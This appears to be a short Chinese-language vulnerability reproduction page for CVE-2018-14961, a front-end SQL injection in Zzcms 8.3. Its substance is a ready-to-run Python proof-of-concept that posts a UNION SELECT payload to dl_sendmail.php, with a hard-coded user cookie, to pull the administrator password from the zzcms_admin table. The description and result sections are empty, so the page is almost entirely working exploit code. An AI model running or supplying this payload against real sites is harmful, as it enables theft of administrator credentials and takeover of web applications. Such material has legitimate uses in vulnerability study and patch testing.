# CVE-2018-14961 Zzcms 8.3 前台sql注入
### 一、漏洞简介
### 二、漏洞影响
Zzcms 8.3
### 三、复现过程
“`python
#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
import requests as req
url = “http://url:8080/dl/dl_sendmail.php”
cookies = {‘UserName’:’test’,’PassWord’:’81dc9bdb52d04dc20036dbd8313ed055′}
data = { ‘sql’:’select email from zzcms_dl where id=-1 union select pass from zzcms_admin #’}
q = req.post(url,data,cookies=cookies,allow_redirects=False)
print q.status_code
print q.content
“`
测试结果为:
参考链接
https://www.anquanke.com/post/id/156660
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容